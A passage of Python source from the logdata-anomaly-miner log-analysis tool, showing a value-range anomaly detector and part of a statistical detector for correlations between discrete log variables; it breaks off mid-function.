""" super().__init__(anomaly_event_handlers) self.parsing_model = parsing_model def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" match_context = DebugMatchContext(log_atom.raw_data) self.parsing_model.get_match_element('', match_context) debug_info = match_context.get_debug_info() debug_lines = [] for line in debug_info.split('\n'): debug_lines.append(line.strip()) event_data = {'DebugLog': debug_lines} for listener in self.anomaly_event_handlers: listener.receive_event( 'Input.VerboseUnparsedAtomHandler', 'Unparsed atom received', [debug_info + data], event_data, log_atom, self) ValueRangeDetector.py000066400000000000000000000301041437606560100350460ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for numeric value ranges. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import time import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME,\ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class ValueRangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list to specify group identifiers for which numeric ranges should be learned. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence document. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. 
@param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.ranges_min = {} self.ranges_max = {} # Persisted data consists of min and max values for each identifier, i.e., # [["min", [], ], ["max", [], ]] self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.ranges_min = persistence_data[0] self.ranges_max = persistence_data[1] def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. 
all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target target_path_list in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values is outside of expected value ranges for a specific id path. 
if id_event in self.ranges_min and (min(values) < self.ranges_min[id_event] or max(values) > self.ranges_max[id_event]): try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': values, 'Range': [self.ranges_min[id_event], self.ranges_max[id_event]], 'IDpaths': self.id_path_list, 'IDvalues': list(id_event)} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Value range anomaly detected', sorted_log_lines, event_data, log_atom, self) # Extend ranges if learn mode is active. 
if self.learn_mode is True: if id_event in self.ranges_min: self.ranges_min[id_event] = min(self.ranges_min[id_event], min(values)) else: self.ranges_min[id_event] = min(values) if id_event in self.ranges_max: self.ranges_max[id_event] = max(self.ranges_max[id_event], max(values)) else: self.ranges_max[id_event] = max(values) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, [self.ranges_min, self.ranges_max]) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. 
""" if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. 
""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 VariableCorrelationDetector.py000066400000000000000000003537111437606560100367600ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for correlations between discrete variables.""" import numpy as np import logging import sys from scipy.stats import chi2 import time from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class first finds for each eventType a list of pairs of variables, which are afterwards tested if they are correlated. For this a couple of preselection methods can be used. (See self.used_presel_meth) Thereafter the correlations are checked, with the selected methods. (See self.used_cor_meth) This module builds upon the event_type_detector. 
""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, num_init=100, num_update=100, disc_div_thres=0.3, num_steps_create_new_rules=-1, num_upd_until_validation=20, num_end_learning_phase=-1, check_cor_thres=0.5, check_cor_prob_thres=1, check_cor_num_thres=10, min_values_cors_thres=5, new_vals_alarm_thres=3.5, num_bt=30, alpha_bt=0.1, used_homogeneity_test='Chi', alpha_chisquare_test=0.05, max_dist_rule_distr=0.1, used_presel_meth=None, intersect_presel_meth=False, percentage_random_cors=0.20, match_disc_vals_sim_tresh=0.7, exclude_due_distr_lower_limit=0.4, match_disc_distr_threshold=0.5, used_cor_meth=None, used_validate_cor_meth=None, validate_cor_cover_vals_thres=0.7, validate_cor_distinct_thres=0.05, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param num_init minimal number of lines of one event type to initialize the correlation rules. @param num_update number of lines after the initialization after which the correlations are periodically tested and updated. @param disc_div_thres diversity threshold for variables to be considered discrete. @param num_steps_create_new_rules number of update steps, for which new rules are generated periodically. States False if rules should not be updated. 
@param num_upd_until_validation number of update steps, for which the rules are validated periodically. @param num_end_learning_phase number of update steps until the update phase ends and the test phase begins; False if no End should be defined. @param check_cor_thres threshold for the number of allowed different values of the distribution to be considered a correlation. @param check_cor_prob_thres threshold for the difference of the probability of the values to be considered a correlation. @param check_cor_num_thres number of allowed different values for the calculation if the distribution can be considered a correlation. @param min_values_cors_thres minimal number of appearances of values on the left side to consider the distribution as a possible correlation. @param new_vals_alarm_thres threshold which has to be exceeded by number of new values divided by number of old values to generate an alarm. @param num_bt number of considered test-samples for the binomial test. @param alpha_bt significance niveau for the binomial test for the test results. @param used_homogeneity_test states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. @param alpha_chisquare_test significance level alpha for the chi-square test. @param max_dist_rule_distr maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. @param used_presel_meth used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random'] @param intersect_presel_meth states if the intersection or the union of the possible correlations found by the used_presel_meth is used for the resulting correlations. @param percentage_random_cors percentage of the randomly picked correlations of all possible ones in the preselection method random. 
@param match_disc_vals_sim_tresh similarity threshold for the preselection method pick_cor_match_disc_vals. @param exclude_due_distr_lower_limit lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. @param match_disc_distr_threshold threshold for the preselection method pick_cor_match_disc_distr. @param used_cor_meth used correlation detection methods. The implemented methods are ['Rel', 'WRel']. @param used_validate_cor_meth used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. @param validate_cor_cover_vals_thres threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. @param validate_cor_distinct_thres threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions have to surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param learn_mode specifies whether new values should be learned. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, num_init=num_init, num_update=num_update, disc_div_thres=disc_div_thres, num_steps_create_new_rules=num_steps_create_new_rules, num_upd_until_validation=num_upd_until_validation, num_end_learning_phase=num_end_learning_phase, check_cor_thres=check_cor_thres, check_cor_prob_thres=check_cor_prob_thres, check_cor_num_thres=check_cor_num_thres, min_values_cors_thres=min_values_cors_thres, new_vals_alarm_thres=new_vals_alarm_thres, num_bt=num_bt, alpha_bt=alpha_bt, used_homogeneity_test=used_homogeneity_test, alpha_chisquare_test=alpha_chisquare_test, max_dist_rule_distr=max_dist_rule_distr, used_presel_meth=used_presel_meth, intersect_presel_meth=intersect_presel_meth, percentage_random_cors=percentage_random_cors, match_disc_vals_sim_tresh=match_disc_vals_sim_tresh, exclude_due_distr_lower_limit=exclude_due_distr_lower_limit, match_disc_distr_threshold=match_disc_distr_threshold, used_cor_meth=used_cor_meth, used_validate_cor_meth=used_validate_cor_meth, validate_cor_cover_vals_thres=validate_cor_cover_vals_thres, validate_cor_distinct_thres=validate_cor_distinct_thres, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.event_type_detector.add_following_modules(self) self.variable_type_detector = None if any(self.event_type_detector.following_modules[j].__class__.__name__ == 'VariableTypeDetector' for j in range( len(self.event_type_detector.following_modules))): try: self.variable_type_detector = 
self.event_type_detector.following_modules[next(j for j in range( len(self.event_type_detector.following_modules)) if self.event_type_detector.following_modules[j].__class__.__name__ == 'VariableTypeDetector')] except StopIteration: pass if self.event_type_detector.min_num_vals < max(num_init, num_update): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(num_init, num_update)} to prevent errors in the execution of the VCD' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(num_init, num_update) if self.event_type_detector.max_num_vals < max(num_init, num_update) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(num_init, num_update) + 500} to prevent errors in the execution of the VCD' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(num_init, num_update) + 500 if self.used_homogeneity_test not in ['Chi', 'MaxDist']: raise ValueError(f"The homogeneity test '{used_homogeneity_test}' does not exist!") if self.used_presel_meth is None: self.used_presel_meth = [] for presel_meth in self.used_presel_meth: if presel_meth not in ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']: raise ValueError(f"The preselection method '{presel_meth}' does not exist!") if self.percentage_random_cors <= 0. or self.percentage_random_cors >= 1.: raise ValueError('The Random preselection method makes no sense if percentage_random_cors = %f. 
If the percentage_random_cors' ' is >= 1.0 better use no preselection method for that case.') if self.used_cor_meth is None or self.used_cor_meth == []: self.used_cor_meth = ['Rel', 'WRel'] for cor_meth in self.used_cor_meth: if cor_meth not in ['Rel', 'WRel']: raise ValueError(f"The correlation rule '{cor_meth}' does not exist!") if self.used_validate_cor_meth is None: self.used_validate_cor_meth = ['coverVals', 'distinctDistr'] # The distinctDistr validation requires the 'WRel' method. if 'WRel' not in self.used_cor_meth: self.used_validate_cor_meth = ['coverVals'] for validate_cor_meth in self.used_validate_cor_meth: if validate_cor_meth not in ['coverVals', 'distinctDistr']: raise ValueError(f"The validation correlation rule '{validate_cor_meth}' does not exist!") if 'WRel' not in self.used_cor_meth and 'distinctDistr' in self.used_validate_cor_meth: raise ValueError("The 'distinctDistr' validation correlation rule requires the 'WRel' correlation method!") # Calculate the minimal number of successes for the BT self.min_successes_bt = self.bt_min_successes(self.num_bt, 1 - self.alpha_bt, self.alpha_bt) self.update_rules = [] # List which states for what event types the rules are updated self.generate_rules = [] # List which states for what event types new rules are being generated self.min_successes_bt = 0 # Minimal number of successes for the binomialtest self.discrete_indices = [] # List of the indices to every event type which are assumed to be discrete self.pos_var_val = [] # List of the possible values to the single variables of the event types self.pos_var_cor = [] # List of all pairs of variables of the event types which are assumed to be correlated self.rel_list = [] # List of lists, that saves the data for the found correlations with the method Rel. 
# First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_list = [] # List of lists, that saves the data for the correlation finding with WRel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_num_ll_to_vals = [] # List of the number of lines in which the values of the first variable have appeared self.w_rel_ht_results = [] # List of the results of the homogeneity tests for the binomial test self.w_rel_confidences = [] # List for the confidences of the homogeneity tests self.initialized = [] # List that states if the single event types have been initiailized at least once self.log_atom = None # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if self.event_type_detector.load_persistence_data is True if persistence_data is not None: self.load_persistence_data(persistence_data) # skipcq: PYL-W0613 def receive_atom(self, log_atom): """ Receive an parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. 
""" event_index = self.event_type_detector.current_index if event_index == -1: return False if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False self.log_atom = log_atom if self.event_type_detector.num_event_lines[event_index] >= self.num_init and ( len(self.initialized) <= event_index or not self.initialized[event_index]): # Initialisation Phase self.init_cor(event_index) # Initialise the correlations if self.update_rules[event_index] and self.learn_mode: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = log_atom.atom_time + self.stop_learning_no_anomaly_time # Print the found correlations if 'Rel' in self.used_cor_meth: self.print_ini_rel(event_index) if 'WRel' in self.used_cor_meth: self.print_ini_w_rel(event_index) # Updates or tests the correlations elif self.event_type_detector.num_event_lines[event_index] > self.num_init and \ (self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: # Checks if the correlations should be updated or tested if self.num_end_learning_phase < 0 or self.event_type_detector.num_event_lines[event_index]-self.num_init <= \ (self.num_update*self.num_end_learning_phase): # Update Phase self.update_rules[event_index] = True if 
self.num_steps_create_new_rules > 0 and ((self.event_type_detector.num_event_lines[ event_index]-self.num_init) / self.num_update) % self.num_steps_create_new_rules == 0: # generate new rules self.generate_rules[event_index] = True else: self.generate_rules[event_index] = False else: # Test Phase self.update_rules[event_index] = False self.generate_rules[event_index] = False # Updates or tests the correlations self.update_or_test_cor(event_index) if self.generate_rules[event_index] and ((self.event_type_detector.num_event_lines[ event_index] - self.num_init) / self.num_update / self.num_steps_create_new_rules) % self.num_upd_until_validation == 0: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.pos_var_cor, self.pos_var_val, self.discrete_indices, self.update_rules, self.generate_rules, self.rel_list, self.w_rel_list, self.w_rel_num_ll_to_vals, self.w_rel_ht_results, self.w_rel_confidences] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) def load_persistence_data(self, persistence_data): """Extract the persistence data and appends various lists to create a consistent state.""" self.pos_var_cor = persistence_data[0] self.pos_var_val = persistence_data[1] self.discrete_indices = persistence_data[2] self.update_rules = persistence_data[3] self.generate_rules = persistence_data[4] self.rel_list = persistence_data[5] self.w_rel_list = 
persistence_data[6] self.w_rel_num_ll_to_vals = persistence_data[7] self.w_rel_ht_results = persistence_data[8] self.w_rel_confidences = persistence_data[9] self.initialized = [False for _ in self.pos_var_cor] for event_index, indices in enumerate(self.discrete_indices): if len(indices) > 0: self.initialized[event_index] = True def allowlist_event(self, event_type, event_data, allowlisting_data): # skipcq: PYL-W0613 """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': raise Exception('Event not from this source') raise Exception('No allowlisting for algorithm malfunction or configuration errors') def init_cor(self, event_index): """Initialise the possible correlations and runs the init-functions for the methods in self.used_cor_meth.""" # Append the supporting lists if necessary if len(self.pos_var_cor) < event_index+1: for i in range(event_index + 1 - len(self.pos_var_cor)): self.pos_var_cor.append([]) self.pos_var_val.append([]) self.discrete_indices.append([]) self.update_rules.append(True) self.generate_rules.append(True) self.initialized.append(False) self.initialized[event_index] = True # Initialise the indices to the assumed discrete variables if len(self.discrete_indices[event_index]) == 0: # If the var_typeD is linked, append the discrete fields if self.variable_type_detector is not None: for i in range(len(self.event_type_detector.variable_key_list[event_index])): # skipcq: PTC-W0060 if len(self.variable_type_detector.var_type[event_index][i]) > 0 and \ self.variable_type_detector.var_type[event_index][i][0] == 'd' and ( self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][i] in self.target_path_list): self.discrete_indices[event_index].append(i) 
self.pos_var_val[event_index].append(self.variable_type_detector.var_type[event_index][i][1]) # Else use the variables which are neither unique nor static # !!! else: self.discrete_indices[event_index] = [ var_index for var_index in range(len(self.event_type_detector.variable_key_list[event_index])) if self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list] for i in range(len(self.event_type_detector.values[event_index]) - 1, -1, -1): # skipcq: PTC-W0060 tmp_list = list(set(self.event_type_detector.values[event_index][i][-self.num_init:])) if len(tmp_list) == 1 or (len(tmp_list) > self.disc_div_thres * self.num_init): del self.discrete_indices[event_index][i] else: self.pos_var_val[event_index].append(tmp_list) self.pos_var_val[event_index].reverse() # Initialise the list of the possible correlations # If no preselection method is used all discrete variables are matched with each other if not self.used_presel_meth: self.pos_var_cor[event_index] = [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range( i+1, len(self.discrete_indices[event_index]))] # Else the preselection methods are used to generate the list of possible correlations else: first_run = True # Only used if the interception of the preselected possible correlations are further analysed # Generate the possible correlations for the preselection methods for meth in self.used_presel_meth: tmp_pos_var_cor = [] # List of the possible correlations for one preselection method if self.variable_type_detector is None: variable_values = [[] for _ in range(len(self.discrete_indices[event_index]))] # skipcq: PTC-W0060 variable_distributions = [[] for _ in range(len(self.discrete_indices[event_index]))] # skipcq: PTC-W0060 for i, val in enumerate(self.discrete_indices[event_index]): for j in range(-1, -self.num_init-1, -1): if self.event_type_detector.values[event_index][val][j] not in variable_values[i]: 
variable_values[i].append(self.event_type_detector.values[event_index][val][j]) variable_distributions[i].append(1) else: variable_distributions[i][variable_values[i].index(self.event_type_detector.values[event_index][ val][j])] += 1 tmp_sum = sum(variable_distributions[i]) variable_distributions[i] = [variable_distributions[i][j]/tmp_sum for j in range( len(variable_distributions[i]))] if meth == 'excludeDueDistr': useable_indices = [] # list of the indices, which are not excluded if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): if self.pick_cor_exclude_due_distr(self.variable_type_detector.var_type[event_index][val][2]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_exclude_due_distr(variable_distributions[i]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) tmp_pos_var_cor = [[i, j] for i in useable_indices for j in useable_indices if i < j] elif meth == 'matchDiscDistr': if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(val)): # skipcq: PTC-W0060 if self.pick_cor_match_disc_distr(self.variable_type_detector.var_type[event_index][ val][2], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][2]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_distr(variable_distributions[i], variable_distributions[j]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == 'matchDiscVals': if 
self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_vals(self.variable_type_detector.var_type[event_index][ val][1], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][1]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 for j in range(i+1, len(self.discrete_indices[event_index])): # skipcq: PTC-W0060 if self.pick_cor_match_disc_vals(variable_values[i], variable_values[j]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == 'random': tmp_pos_var_cor = self.pick_cor_random(event_index) # Initialize, append or intercept self.pos_var_cor with tmp_pos_var_cor # Initialize self.pos_var_cor if first_run: first_run = False self.pos_var_cor[event_index] = tmp_pos_var_cor # Intercept self.pos_var_cor elif self.intersect_presel_meth: for i in range(len(self.pos_var_cor[event_index]) - 1, -1, -1): # skipcq: PTC-W0060 if self.pos_var_cor[event_index][i] not in tmp_pos_var_cor: del self.pos_var_cor[event_index][i] # Append self.pos_var_cor else: for cor in tmp_pos_var_cor: if cor not in self.pos_var_cor[event_index]: self.pos_var_cor[event_index].append(cor) # Initialise the correlation methods for meth in self.used_cor_meth: if meth == 'Rel': self.init_cor_rel(event_index) elif meth == 'WRel': self.init_cor_w_rel(event_index) def init_cor_rel(self, event_index): """Initialize supporting lists for the method 'Rel'.""" # Initialise self.rel_list if len(self.rel_list) < event_index+1: for i in range(event_index + 1 - len(self.rel_list)): self.rel_list.append([]) if len(self.rel_list[event_index]) == 0: for i in range(len(self.pos_var_cor[event_index])): # skipcq: 
PTC-W0060 self.rel_list[event_index].append([{}, {}]) # Only calculate the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously if i_val not in self.rel_list[event_index][pos_var_cor_index][0]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 1} # If the j_val has already appeared, then the var i had another value than i_val, # therefore the relation j:j_val -> i:i_val is not possible if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Else add the relation j=j_val -> i=i_val else: self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} continue # Check if j_val has not appeared previously if j_val not in self.rel_list[event_index][pos_var_cor_index][1]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} # i=i_val -> j=j_val is not possible del self.rel_list[event_index][pos_var_cor_index][0][i_val] continue # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][0][i_val] != {} and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: del 